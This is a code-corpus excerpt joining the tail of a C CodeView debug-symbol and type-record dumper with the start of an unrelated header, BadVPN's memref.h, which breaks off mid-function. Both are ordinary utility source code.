For now, we store it in a SymTag-like type * (so that the rest of the process is seamless), but check at udt inclusion * type for its presence */ case LF_BITFIELD_V1: printf("\t%x => Bitfield V1:%x offset:%u #bits:%u\n", curr_type, reftype->bitfield_v1.type, reftype->bitfield_v1.bitoff, reftype->bitfield_v1.nbits); break; case LF_BITFIELD_V2: printf("\t%x => Bitfield V2:%x offset:%u #bits:%u\n", curr_type, reftype->bitfield_v2.type, reftype->bitfield_v2.bitoff, reftype->bitfield_v2.nbits); break; case LF_FIELDLIST_V1: case LF_FIELDLIST_V2: printf("\t%x => Fieldlist\n", curr_type); do_field(reftype->fieldlist.list, (const BYTE*)type + reftype->generic.len + 2); break; case LF_STRUCTURE_V1: case LF_CLASS_V1: leaf_len = numeric_leaf(&value, &type->struct_v1.structlen); printf("\t%x => %s V1 '%s' elts:%u property:%s fieldlist-type:%x derived-type:%x vshape:%x size:%u\n", curr_type, type->generic.id == LF_CLASS_V1 ? "Class" : "Struct", p_string(PSTRING(&type->struct_v1.structlen, leaf_len)), type->struct_v1.n_element, get_property(type->struct_v1.property), type->struct_v1.fieldlist, type->struct_v1.derived, type->struct_v1.vshape, value); break; case LF_STRUCTURE_V2: case LF_CLASS_V2: leaf_len = numeric_leaf(&value, &type->struct_v2.structlen); printf("\t%x => %s V2 '%s' elts:%u property:%s\n" " fieldlist-type:%x derived-type:%x vshape:%x size:%u\n", curr_type, type->generic.id == LF_CLASS_V2 ? "Class" : "Struct", p_string(PSTRING(&type->struct_v2.structlen, leaf_len)), type->struct_v2.n_element, get_property(type->struct_v2.property), type->struct_v2.fieldlist, type->struct_v2.derived, type->struct_v2.vshape, value); break; case LF_STRUCTURE_V3: case LF_CLASS_V3: leaf_len = numeric_leaf(&value, &type->struct_v3.structlen); str = (const char*)&type->struct_v3.structlen + leaf_len; printf("\t%x => %s V3 '%s' elts:%u property:%s\n" " fieldlist-type:%x derived-type:%x vshape:%x size:%u\n", curr_type, type->generic.id == LF_CLASS_V3 ? 
"Class" : "Struct", str, type->struct_v3.n_element, get_property(type->struct_v3.property), type->struct_v3.fieldlist, type->struct_v3.derived, type->struct_v3.vshape, value); break; case LF_UNION_V1: leaf_len = numeric_leaf(&value, &type->union_v1.un_len); printf("\t%x => Union V1 '%s' count:%u property:%s fieldlist-type:%x size:%u\n", curr_type, p_string(PSTRING(&type->union_v1.un_len, leaf_len)), type->union_v1.count, get_property(type->union_v1.property), type->union_v1.fieldlist, value); break; case LF_UNION_V2: leaf_len = numeric_leaf(&value, &type->union_v2.un_len); printf("\t%x => Union V2 '%s' count:%u property:%s fieldlist-type:%x size:%u\n", curr_type, p_string(PSTRING(&type->union_v2.un_len, leaf_len)), type->union_v2.count, get_property(type->union_v2.property), type->union_v2.fieldlist, value); break; case LF_UNION_V3: leaf_len = numeric_leaf(&value, &type->union_v3.un_len); str = (const char*)&type->union_v3.un_len + leaf_len; printf("\t%x => Union V3 '%s' count:%u property:%s fieldlist-type:%x size:%u\n", curr_type, str, type->union_v3.count, get_property(type->union_v3.property), type->union_v3.fieldlist, value); break; case LF_ENUM_V1: printf("\t%x => Enum V1 '%s' type:%x field-type:%x count:%u property:%s\n", curr_type, p_string(&type->enumeration_v1.p_name), type->enumeration_v1.type, type->enumeration_v1.fieldlist, type->enumeration_v1.count, get_property(type->enumeration_v1.property)); break; case LF_ENUM_V2: printf("\t%x => Enum V2 '%s' type:%x field-type:%x count:%u property:%s\n", curr_type, p_string(&type->enumeration_v2.p_name), type->enumeration_v2.type, type->enumeration_v2.fieldlist, type->enumeration_v2.count, get_property(type->enumeration_v2.property)); break; case LF_ENUM_V3: printf("\t%x => Enum V3 '%s' type:%x field-type:%x count:%u property:%s\n", curr_type, type->enumeration_v3.name, type->enumeration_v3.type, type->enumeration_v3.fieldlist, type->enumeration_v3.count, get_property(type->enumeration_v3.property)); break; case LF_ARGLIST_V1: printf("\t%x => Arglist V1(#%u):", curr_type, reftype->arglist_v1.num); for (i = 0; i < reftype->arglist_v1.num; i++) { printf(" %x", reftype->arglist_v1.args[i]); } printf("\n"); break; case LF_ARGLIST_V2: printf("\t%x => Arglist V2(#%u):", curr_type, reftype->arglist_v2.num); for (j = 0; j < reftype->arglist_v2.num; j++) { printf("\t %x", reftype->arglist_v2.args[j]); } printf("\t\n"); break; case LF_PROCEDURE_V1: /* FIXME: unknown could be the calling convention for the proc */ printf("\t%x => Procedure V1 ret_type:%x call:%x (#%u args_type:%x)\n", curr_type, type->procedure_v1.rvtype, type->procedure_v1.call, type->procedure_v1.params, type->procedure_v1.arglist); break; case LF_PROCEDURE_V2: printf("\t%x => Procedure V2 ret_type:%x unk:%x (#%u args_type:%x)\n", curr_type, type->procedure_v2.rvtype, type->procedure_v2.call, type->procedure_v2.params, type->procedure_v2.arglist); break; case LF_MFUNCTION_V2: printf("\t%x => MFunction V2 ret-type:%x call:%x class-type:%x this-type:%x\n" "\t\t#args:%x args-type:%x this_adjust:%x\n", curr_type, type->mfunction_v2.rvtype, type->mfunction_v2.call, type->mfunction_v2.class_type, type->mfunction_v2.this_type, type->mfunction_v2.params, type->mfunction_v2.arglist, type->mfunction_v2.this_adjust); break; case LF_MODIFIER_V1: printf("\t%x => Modifier V1 type:%x modif:%x\n", curr_type, type->modifier_v1.type, type->modifier_v1.attribute); break; case LF_MODIFIER_V2: printf("\t%x => Modifier V2 type:%x modif:%x\n", curr_type, type->modifier_v2.type, 
type->modifier_v2.attribute); break; case LF_METHODLIST_V1: { const unsigned short* pattr = (const unsigned short*)((const char*)type + 4); printf("\t%x => Method list\n", curr_type); while ((const char*)pattr < (const char*)type + type->generic.len + 2) { switch ((*pattr >> 2) & 7) { case 4: case 6: printf("\t\t\tattr:%s type:%x vtab-offset:%x\n", get_attr(pattr[0]), pattr[1], *(const unsigned*)(&pattr[2])); pattr += 3; break; default: printf("\t\t\tattr:%s type:%x\n", get_attr(pattr[0]), pattr[1]); pattr += 2; } } } break; case LF_METHODLIST_V2: { const unsigned* pattr = (const unsigned*)((const char*)type + 4); printf("\t%x => Method list\n", curr_type); while ((const char*)pattr < (const char*)type + type->generic.len + 2) { switch ((*pattr >> 2) & 7) { case 4: case 6: printf("\t\t\tattr:%s type:%x vtab-offset:%x\n", get_attr(pattr[0]), pattr[1], pattr[2]); pattr += 3; break; default: printf("\t\t\tattr:%s type:%x\n", get_attr(pattr[0]), pattr[1]); pattr += 2; } } } break; case LF_VTSHAPE_V1: { int count = *(const unsigned short*)((const char*)type + 4); int shift = 0; const char* ptr = (const char*)type + 6; const char* desc[] = {"Near", "Far", "Thin", "Disp to outermost", "Pointer to metaclass", "Near32", "Far32"}; printf("\t%x => VT Shape #%d: ", curr_type, count); while (count--) { if (((*ptr << shift) & 0xF) <= 6) printf("%s ", desc[(*ptr << shift) & 0xF]); else printf("%x ", (*ptr << shift) & 0xF); if (shift == 0) shift = 4; else {shift = 0; ptr++;} } printf("\n"); } break; case LF_DERIVED_V1: printf("\t%x => Derived V1(#%u):", curr_type, reftype->derived_v1.num); for (i = 0; i < reftype->derived_v1.num; i++) { printf(" %x", reftype->derived_v1.drvdcls[i]); } printf("\n"); break; case LF_DERIVED_V2: printf("\t%x => Derived V2(#%u):", curr_type, reftype->derived_v2.num); for (j = 0; j < reftype->derived_v2.num; j++) { printf(" %x", reftype->derived_v2.drvdcls[j]); } printf("\n"); break; default: printf(">>> Unsupported type-id %x for %x\n", type->generic.id, curr_type); dump_data((const void*)type, type->generic.len + 2, ""); break; } } BOOL codeview_dump_types_from_offsets(const void* table, const DWORD* offsets, unsigned num_types) { unsigned long i; for (i = 0; i < num_types; i++) { codeview_dump_one_type(0x1000 + i, (const union codeview_type*)((const char*)table + offsets[i])); } return TRUE; } BOOL codeview_dump_types_from_block(const void* table, unsigned long len) { unsigned int curr_type = 0x1000; const unsigned char*ptr = table; while (ptr - (const unsigned char*)table < len) { const union codeview_type* type = (const union codeview_type*)ptr; codeview_dump_one_type(curr_type, type); curr_type++; ptr += (type->generic.len + 2 + 3) & ~3; } return TRUE; } BOOL codeview_dump_symbols(const void* root, unsigned long size) { unsigned int i; int length; char* curr_func = NULL; int nest_block = 0; /* * Loop over the different types of records and whenever we * find something we are interested in, record it and move on. */ for (i = 0; i < size; i += length) { const union codeview_symbol* sym = (const union codeview_symbol*)((const char*)root + i); length = sym->generic.len + 2; if (!sym->generic.id || length < 4) break; switch (sym->generic.id) { /* * Global and local data symbols. We don't associate these * with any given source file. */ case S_GDATA_V2: case S_LDATA_V2: printf("\tS-%s-Data V2 '%s' %04x:%08x type:%08x\n", sym->generic.id == S_GDATA_V2 ? 
"Global" : "Local", get_symbol_str(p_string(&sym->data_v2.p_name)), sym->data_v2.segment, sym->data_v2.offset, sym->data_v2.symtype); break; case S_LDATA_V3: case S_GDATA_V3: /* EPP case S_DATA_V3: */ printf("\tS-%s-Data V3 '%s' (%04x:%08x) type:%08x\n", sym->generic.id == S_GDATA_V3 ? "Global" : "Local", get_symbol_str(sym->data_v3.name), sym->data_v3.segment, sym->data_v3.offset, sym->data_v3.symtype); break; case S_PUB_V2: printf("\tS-Public V2 '%s' %04x:%08x type:%08x\n", get_symbol_str(p_string(&sym->public_v2.p_name)), sym->public_v2.segment, sym->public_v2.offset, sym->public_v2.symtype); break; case S_PUB_V3: /* not completely sure of those two anyway */ case S_PUB_FUNC1_V3: case S_PUB_FUNC2_V3: printf("\tS-Public%s V3 '%s' %04x:%08x type:%08x\n", sym->generic.id == S_PUB_V3 ? "" : (sym->generic.id == S_PUB_FUNC1_V3 ? "<subkind1" : "<subkind2"), get_symbol_str(sym->public_v3.name), sym->public_v3.segment, sym->public_v3.offset, sym->public_v3.symtype); break; /* * Sort of like a global function, but it just points * to a thunk, which is a stupid name for what amounts to * a PLT slot in the normal jargon that everyone else uses. */ case S_THUNK_V1: printf("\tS-Thunk V1 '%s' (%04x:%08x#%x) type:%x\n", p_string(&sym->thunk_v1.p_name), sym->thunk_v1.segment, sym->thunk_v1.offset, sym->thunk_v1.thunk_len, sym->thunk_v1.thtype); curr_func = strdup(p_string(&sym->thunk_v1.p_name)); break; case S_THUNK_V3: printf("\tS-Thunk V3 '%s' (%04x:%08x#%x) type:%x\n", sym->thunk_v3.name, sym->thunk_v3.segment, sym->thunk_v3.offset, sym->thunk_v3.thunk_len, sym->thunk_v3.thtype); curr_func = strdup(sym->thunk_v3.name); break; /* Global and static functions */ case S_GPROC_V1: case S_LPROC_V1: printf("\tS-%s-Proc V1: '%s' (%04x:%08x#%x) type:%x attr:%x\n", sym->generic.id == S_GPROC_V1 ? "Global" : "-Local", p_string(&sym->proc_v1.p_name), sym->proc_v1.segment, sym->proc_v1.offset, sym->proc_v1.proc_len, sym->proc_v1.proctype, sym->proc_v1.flags); printf("\t Debug: start=%08x end=%08x\n", sym->proc_v1.debug_start, sym->proc_v1.debug_end); if (nest_block) { printf(">>> prev func '%s' still has nest_block %u count\n", curr_func, nest_block); nest_block = 0; } curr_func = strdup(p_string(&sym->proc_v1.p_name)); /* EPP unsigned int pparent; */ /* EPP unsigned int pend; */ /* EPP unsigned int next; */ break; case S_GPROC_V2: case S_LPROC_V2: printf("\tS-%s-Proc V2: '%s' (%04x:%08x#%x) type:%x attr:%x\n", sym->generic.id == S_GPROC_V2 ? "Global" : "-Local", p_string(&sym->proc_v2.p_name), sym->proc_v2.segment, sym->proc_v2.offset, sym->proc_v2.proc_len, sym->proc_v2.proctype, sym->proc_v2.flags); printf("\t Debug: start=%08x end=%08x\n", sym->proc_v2.debug_start, sym->proc_v2.debug_end); if (nest_block) { printf(">>> prev func '%s' still has nest_block %u count\n", curr_func, nest_block); nest_block = 0; } curr_func = strdup(p_string(&sym->proc_v2.p_name)); /* EPP unsigned int pparent; */ /* EPP unsigned int pend; */ /* EPP unsigned int next; */ break; case S_LPROC_V3: case S_GPROC_V3: printf("\tS-%s-Procedure V3 '%s' (%04x:%08x#%x) type:%x attr:%x\n", sym->generic.id == S_GPROC_V3 ? 
"Global" : "Local", sym->proc_v3.name, sym->proc_v3.segment, sym->proc_v3.offset, sym->proc_v3.proc_len, sym->proc_v3.proctype, sym->proc_v3.flags); printf("\t Debug: start=%08x end=%08x\n", sym->proc_v3.debug_start, sym->proc_v3.debug_end); if (nest_block) { printf(">>> prev func '%s' still has nest_block %u count\n", curr_func, nest_block); nest_block = 0; } curr_func = strdup(sym->proc_v3.name); /* EPP unsigned int pparent; */ /* EPP unsigned int pend; */ /* EPP unsigned int next; */ break; /* Function parameters and stack variables */ case S_BPREL_V1: printf("\tS-BP-relative V1: '%s' @%d type:%x (%s)\n", p_string(&sym->stack_v1.p_name), sym->stack_v1.offset, sym->stack_v1.symtype, curr_func); break; case S_BPREL_V2: printf("\tS-BP-relative V2: '%s' @%d type:%x (%s)\n", p_string(&sym->stack_v2.p_name), sym->stack_v2.offset, sym->stack_v2.symtype, curr_func); break; case S_BPREL_V3: printf("\tS-BP-relative V3: '%s' @%d type:%x (in %s)\n", sym->stack_v3.name, sym->stack_v3.offset, sym->stack_v3.symtype, curr_func); break; case S_REGREL_V3: printf("\tS-Reg-relative V3: '%s' @%d type:%x reg:%x (in %s)\n", sym->regrel_v3.name, sym->regrel_v3.offset, sym->regrel_v3.symtype, sym->regrel_v3.reg, curr_func); break; case S_REGISTER_V1: printf("\tS-Register V1 '%s' in %s type:%x register:%x\n", p_string(&sym->register_v1.p_name), curr_func, sym->register_v1.reg, sym->register_v1.type); break; case S_REGISTER_V2: printf("\tS-Register V2 '%s' in %s type:%x register:%x\n", p_string(&sym->register_v2.p_name), curr_func, sym->register_v2.reg, sym->register_v2.type); break; case S_REGISTER_V3: printf("\tS-Register V3 '%s' in %s type:%x register:%x\n", sym->register_v3.name, curr_func, sym->register_v3.reg, sym->register_v3.type); break; case S_BLOCK_V1: printf("\tS-Block V1 '%s' in '%s' (%04x:%08x#%08x)\n", p_string(&sym->block_v1.p_name), curr_func, sym->block_v1.segment, sym->block_v1.offset, sym->block_v1.length); nest_block++; break; case S_BLOCK_V3: printf("\tS-Block V3 '%s' in '%s' (%04x:%08x#%08x) parent:%u end:%x\n", sym->block_v3.name, curr_func, sym->block_v3.segment, sym->block_v3.offset, sym->block_v3.length, sym->block_v3.parent, sym->block_v3.end); nest_block++; break; /* Additional function information */ case S_FRAMEINFO_V2: printf("\tS-Frame-Info V2: frame-size:%x unk2:%x unk3:%x saved-regs-sz:%x eh(%04x:%08x) flags:%08x\n", sym->frame_info_v2.sz_frame, sym->frame_info_v2.unknown2, sym->frame_info_v2.unknown3, sym->frame_info_v2.sz_saved_regs, sym->frame_info_v2.eh_sect, sym->frame_info_v2.eh_offset, sym->frame_info_v2.flags); break; case S_SECUCOOKIE_V3: printf("\tSecurity Cookie V3 @%d unk:%x\n", sym->security_cookie_v3.offset, sym->security_cookie_v3.unknown); break; case S_END_V1: if (nest_block) { nest_block--; printf("\tS-End-Of block (%u)\n", nest_block); } else { printf("\tS-End-Of %s\n", curr_func); free(curr_func); curr_func = NULL; } break; case S_COMPILAND_V1: { const char* machine; const char* lang; switch (sym->compiland_v1.unknown & 0xFF) { case 0x00: machine = "Intel 8080"; break; case 0x01: machine = "Intel 8086"; break; case 0x02: machine = "Intel 80286"; break; case 0x03: machine = "Intel 80386"; break; case 0x04: machine = "Intel 80486"; break; case 0x05: machine = "Intel Pentium"; break; case 0x10: machine = "MIPS R4000"; break; default: { static char tmp[16]; sprintf(tmp, "machine=%x", sym->compiland_v1.unknown & 0xFF); machine = tmp; } break; } switch ((sym->compiland_v1.unknown >> 8) & 0xFF) { case 0x00: lang = "C"; break; case 0x01: lang = "C++"; break; case 
0x02: lang = "Fortran"; break; case 0x03: lang = "Masm"; break; case 0x04: lang = "Pascal"; break; case 0x05: lang = "Basic"; break; case 0x06: lang = "Cobol"; break; default: { static char tmp[16]; sprintf(tmp, "language=%x", (sym->compiland_v1.unknown >> 8) & 0xFF); lang = tmp; } break; } printf("\tS-Compiland V1 '%s' %s %s unk:%x\n", p_string(&sym->compiland_v1.p_name), machine, lang, sym->compiland_v1.unknown >> 16); } break; case S_COMPILAND_V2: printf("\tS-Compiland V2 '%s'\n", p_string(&sym->compiland_v2.p_name)); dump_data((const void*)sym, sym->generic.len + 2, " "); { const char* ptr = sym->compiland_v2.p_name.name + sym->compiland_v2.p_name.namelen; while (*ptr) { printf("\t\t%s => ", ptr); ptr += strlen(ptr) + 1; printf("%s\n", ptr); ptr += strlen(ptr) + 1; } } break; case S_COMPILAND_V3: printf("\tS-Compiland V3 '%s' unknown:%x\n", sym->compiland_v3.name, sym->compiland_v3.unknown); break; case S_OBJNAME_V1: printf("\tS-ObjName V1 sig:%.4s '%s'\n", sym->objname_v1.signature, p_string(&sym->objname_v1.p_name)); break; case S_LABEL_V1: printf("\tS-Label V1 '%s' in '%s' (%04x:%08x)\n", p_string(&sym->label_v1.p_name), curr_func, sym->label_v1.segment, sym->label_v1.offset); break; case S_LABEL_V3: printf("\tS-Label V3 '%s' in '%s' (%04x:%08x) flag:%x\n", sym->label_v3.name, curr_func, sym->label_v3.segment, sym->label_v3.offset, sym->label_v3.flags); break; case S_CONSTANT_V2: { int vlen; struct full_value fv; vlen = full_numeric_leaf(&fv, &sym->constant_v2.cvalue); printf("\tS-Constant V2 '%s' = %s type:%x\n", p_string(PSTRING(&sym->constant_v2.cvalue, vlen)), full_value_string(&fv), sym->constant_v2.type); } break; case S_CONSTANT_V3: { int vlen; struct full_value fv; vlen = full_numeric_leaf(&fv, &sym->constant_v3.cvalue); printf("\tS-Constant V3 '%s' = %s type:%x\n", (const char*)&sym->constant_v3.cvalue + vlen, full_value_string(&fv), sym->constant_v3.type); } break; case S_UDT_V1: printf("\tS-Udt V1 '%s': type:0x%x\n", p_string(&sym->udt_v1.p_name), sym->udt_v1.type); break; case S_UDT_V2: printf("\tS-Udt V2 '%s': type:0x%x\n", p_string(&sym->udt_v2.p_name), sym->udt_v2.type); break; case S_UDT_V3: printf("\tS-Udt V3 '%s': type:0x%x\n", sym->udt_v3.name, sym->udt_v3.type); break; /* * These are special, in that they are always followed by an * additional length-prefixed string which is *not* included * into the symbol length count. We need to skip it. */ case S_PROCREF_V1: printf("\tS-Procref V1 "); goto doaref; case S_DATAREF_V1: printf("\tS-Dataref V1 "); goto doaref; case S_LPROCREF_V1: printf("\tS-L-Procref V1 "); goto doaref; doaref: { const struct p_string* pname; pname = PSTRING(sym, length); length += (pname->namelen + 1 + 3) & ~3; printf("\t%08x %08x %08x '%s'\n", *(((const DWORD*)sym) + 1), *(((const DWORD*)sym) + 2), *(((const DWORD*)sym) + 3), p_string(pname)); } break; case S_MSTOOL_V3: /* info about tool used to create CU */ { const unsigned short* ptr = ((const unsigned short*)sym) + 2; const char* x1; const char* x2 = (const char*)&ptr[9]; /* FIXME: what are all those values for ? 
*/ printf("\tTool V3 unk=%04x%04x%04x front=%d.%d.%d.0 back=%d.%d.%d.0 %s\n", ptr[0], ptr[1], ptr[2], ptr[3], ptr[4], ptr[5], ptr[6], ptr[7], ptr[8], x2); while (*(x1 = x2 + strlen(x2) + 1)) { x2 = x1 + strlen(x1) + 1; if (!*x2) break; printf("\t\t%s: %s\n", x1, x2); } } break; case S_MSTOOLINFO_V3: { const unsigned short* ptr = ((const unsigned short*)sym) + 2; printf("\tTool info V3: unk=%04x%04x%04x front=%d.%d.%d.%d back=%d.%d.%d.%d %s\n", ptr[0], ptr[1], ptr[2], ptr[3], ptr[4], ptr[5], ptr[6], ptr[7], ptr[8], ptr[9], ptr[10], (const char*)(ptr + 11)); } break; case S_MSTOOLENV_V3: { const char* x1 = (const char*)sym + 4 + 1; const char* x2; printf("\tTool conf V3\n"); while (*x1) { x2 = x1 + strlen(x1) + 1; if (!*x2) break; printf("\t\t%s: %s\n", x1, x2); x1 = x2 + strlen(x2) + 1; } } break; case S_ALIGN_V1: /* simply skip it */ break; case S_SSEARCH_V1: printf("\tSSearch V1: (%04x:%08x)\n", sym->ssearch_v1.segment, sym->ssearch_v1.offset); break; case S_SECTINFO_V3: printf("\tSSection Info: seg=%04x ?=%04x rva=%08x size=%08x attr=%08x %s\n", *(const unsigned short*)((const char*)sym + 4), *(const unsigned short*)((const char*)sym + 6), *(const unsigned*)((const char*)sym + 8), *(const unsigned*)((const char*)sym + 12), *(const unsigned*)((const char*)sym + 16), (const char*)sym + 20); break; case S_SUBSECTINFO_V3: printf("\tSSubSection Info: addr=%04x:%08x size=%08x attr=%08x %s\n", *(const unsigned short*)((const char*)sym + 16), *(const unsigned*)((const char*)sym + 12), *(const unsigned*)((const char*)sym + 4), *(const unsigned*)((const char*)sym + 8), (const char*)sym + 18); break; case S_ENTRYPOINT_V3: printf("\tSEntryPoint: id=%x '%s'\n", *(const unsigned*)((const char*)sym + 4), (const char*)sym + 8); break; case S_LTHREAD_V1: case S_GTHREAD_V1: printf("\tS-Thread %s Var V1 '%s' seg=%04x offset=%08x type=%x\n", sym->generic.id == S_LTHREAD_V1 ? "global" : "local", p_string(&sym->thread_v1.p_name), sym->thread_v1.segment, sym->thread_v1.offset, sym->thread_v1.symtype); break; case S_LTHREAD_V2: case S_GTHREAD_V2: printf("\tS-Thread %s Var V2 '%s' seg=%04x offset=%08x type=%x\n", sym->generic.id == S_LTHREAD_V2 ? "global" : "local", p_string(&sym->thread_v2.p_name), sym->thread_v2.segment, sym->thread_v2.offset, sym->thread_v2.symtype); break; case S_LTHREAD_V3: case S_GTHREAD_V3: printf("\tS-Thread %s Var V3 '%s' seg=%04x offset=%08x type=%x\n", sym->generic.id == S_LTHREAD_V3 ? "global" : "local", sym->thread_v3.name, sym->thread_v3.segment, sym->thread_v3.offset, sym->thread_v3.symtype); break; default: printf(">>> Unsupported symbol-id %x sz=%d\n", sym->generic.id, sym->generic.len + 2); dump_data((const void*)sym, sym->generic.len + 2, " "); } } return TRUE; } void codeview_dump_linetab(const char* linetab, BOOL pascal_str, const char* pfx) { const char* ptr = linetab; int nfile, nseg, nline; int i, j, k; const unsigned int* filetab; const unsigned int* lt_ptr; const struct startend* start; nfile = *(const short*)linetab; filetab = (const unsigned int*)(linetab + 2 * sizeof(short)); printf("%s%d files with %d ???\n", pfx, nfile, *(const short*)(linetab + sizeof(short))); for (i = 0; i < nfile; i++) { ptr = linetab + filetab[i]; nseg = *(const short*)ptr; ptr += 2 * sizeof(short); lt_ptr = (const unsigned int*)ptr; start = (const struct startend*)(lt_ptr + nseg); /* * Now snarf the filename for all of the segments for this file. 
*/ if (pascal_str) { char filename[MAX_PATH]; const struct p_string* p_fn; p_fn = (const struct p_string*)(start + nseg); memset(filename, 0, sizeof(filename)); memcpy(filename, p_fn->name, p_fn->namelen); printf("%slines for file #%d/%d %s %d\n", pfx, i, nfile, filename, nseg); } else printf("%slines for file #%d/%d %s %d\n", pfx, i, nfile, (const char*)(start + nseg), nseg); for (j = 0; j < nseg; j++) { ptr = linetab + *lt_ptr++; nline = *(const short*)(ptr + 2); printf("%s %04x:%08x-%08x #%d\n", pfx, *(const short*)(ptr + 0), start[j].start, start[j].end, nline); ptr += 4; for (k = 0; k < nline; k++) { printf("%s %x %d\n", pfx, ((const unsigned int*)ptr)[k], ((const unsigned short*)((const unsigned int*)ptr + nline))[k]); } } } } void codeview_dump_linetab2(const char* linetab, DWORD size, const char* strimage, DWORD strsize, const char* pfx) { unsigned i; const struct codeview_linetab2* lt2; const struct codeview_linetab2* lt2_files = NULL; const struct codeview_lt2blk_lines* lines_blk; const struct codeview_linetab2_file*fd; /* locate LT2_FILES_BLOCK (if any) */ lt2 = (const struct codeview_linetab2*)linetab; while ((const char*)(lt2 + 1) < linetab + size) { if (lt2->header == LT2_FILES_BLOCK) { lt2_files = lt2; break; } lt2 = codeview_linetab2_next_block(lt2); } if (!lt2_files) { printf("%sNo LT2_FILES_BLOCK found\n", pfx); return; } lt2 = (const struct codeview_linetab2*)linetab; while ((const char*)(lt2 + 1) < linetab + size) { /* FIXME: should also check that whole lbh fits in linetab + size */ switch (lt2->header) { case LT2_LINES_BLOCK: lines_blk = (const struct codeview_lt2blk_lines*)lt2; printf("%sblock from %04x:%08x #%x (%x lines) fo=%x\n", pfx, lines_blk->seg, lines_blk->start, lines_blk->size, lines_blk->nlines, lines_blk->file_offset); /* FIXME: should check that file_offset is within the LT2_FILES_BLOCK we've seen */ fd = (const struct codeview_linetab2_file*)((const char*)lt2_files + 8 + lines_blk->file_offset); printf("%s md5=%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x\n", pfx, fd->md5[ 0], fd->md5[ 1], fd->md5[ 2], fd->md5[ 3], fd->md5[ 4], fd->md5[ 5], fd->md5[ 6], fd->md5[ 7], fd->md5[ 8], fd->md5[ 9], fd->md5[10], fd->md5[11], fd->md5[12], fd->md5[13], fd->md5[14], fd->md5[15]); /* FIXME: should check that string is within strimage + strsize */ printf("%s file=%s\n", pfx, strimage ? strimage + fd->offset : "--none--"); for (i = 0; i < lines_blk->nlines; i++) { printf("%s offset=%08x line=%d\n", pfx, lines_blk->l[i].offset, lines_blk->l[i].lineno ^ 0x80000000); } break; case LT2_FILES_BLOCK: /* skip */ break; default: printf("%sblock end %x\n", pfx, lt2->header); lt2 = (const struct codeview_linetab2*)(linetab + size); continue; } lt2 = codeview_linetab2_next_block(lt2); } }
31,790
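The codeview_dump_types_from_block walker above encodes the layout of a raw type block: each record starts with a 16-bit generic.len that does not count its own two bytes, and the walker advances by (len + 2 + 3) & ~3, i.e. the record size rounded up to a multiple of four. A minimal Python sketch of that same iteration, assuming the block is already in memory as bytes and the length field is little-endian, looks like this:

# Sketch: walk a CodeView type block the same way codeview_dump_types_from_block does.
# Assumptions: `data` is the raw block as bytes, the 16-bit record length is
# little-endian, and numbering starts at 0x1000 as in the C code above.
import struct

def iter_type_records(data):
    """Yield (type_id, record_bytes) pairs using the C walker's stride."""
    curr_type = 0x1000
    offset = 0
    while offset < len(data):
        (length,) = struct.unpack_from("<H", data, offset)  # generic.len
        yield curr_type, data[offset:offset + length + 2]   # len excludes its own 2 bytes
        curr_type += 1
        offset += (length + 2 + 3) & ~3                     # round up to a 4-byte boundary

# Example (path is a placeholder):
# with open("typeblock.bin", "rb") as f:
#     print(sum(1 for _ in iter_type_records(f.read())))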
1,759
<gh_stars>1000+ /** * @file memref.h * @author <NAME> <<EMAIL>> * * @section LICENSE * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. Neither the name of the author nor the * names of its contributors may be used to endorse or promote products * derived from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY * DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #ifndef BADVPN_MEMREF_H #define BADVPN_MEMREF_H #include <stddef.h> #include <string.h> #include <limits.h> #include <misc/debug.h> #include <misc/balloc.h> #include <misc/strdup.h> typedef struct { char const *ptr; size_t len; } MemRef; static MemRef MemRef_Make (char const *ptr, size_t len); static MemRef MemRef_MakeCstr (char const *ptr); static char MemRef_At (MemRef o, size_t pos); static void MemRef_AssertRange (MemRef o, size_t offset, size_t length); static MemRef MemRef_SubFrom (MemRef o, size_t offset); static MemRef MemRef_SubTo (MemRef o, size_t length); static MemRef MemRef_Sub (MemRef o, size_t offset, size_t length); static char * MemRef_StrDup (MemRef o); static void MemRef_CopyOut (MemRef o, char *out); static int MemRef_Equal (MemRef o, MemRef other); static int MemRef_FindChar (MemRef o, char ch, size_t *out_index); #define MEMREF_LOOP_CHARS__BODY(char_rel_pos_var, char_var, body) \ { \ for (size_t char_rel_pos_var = 0; char_rel_pos_var < MemRef__Loop_length; char_rel_pos_var++) { \ char char_var = MemRef__Loop_o.ptr[MemRef__Loop_offset + char_rel_pos_var]; \ { body } \ } \ } #define MEMREF_LOOP_CHARS_RANGE(o, offset, length, char_rel_pos_var, char_var, body) \ { \ MemRef MemRef__Loop_o = (o); \ size_t MemRef__Loop_offset = (offset); \ size_t MemRef__Loop_length = (length); \ MEMREF_LOOP_CHARS__BODY(char_rel_pos_var, char_var, body) \ } #define MEMREF_LOOP_CHARS(o, char_rel_pos_var, char_var, body) \ { \ MemRef MemRef__Loop_o = (o); \ size_t MemRef__Loop_offset = 0; \ size_t MemRef__Loop_length = MemRef__Loop_o.len; \ MEMREF_LOOP_CHARS__BODY(char_rel_pos_var, char_var, body) \ } // static MemRef MemRef_Make (char const *ptr, size_t len) { MemRef res; res.ptr = ptr; res.len = len; return res; } static MemRef MemRef_MakeCstr (char const *ptr) { ASSERT(ptr) return MemRef_Make(ptr, strlen(ptr)); } static char MemRef_At (MemRef o, size_t pos) { ASSERT(o.ptr) ASSERT(pos < o.len) return 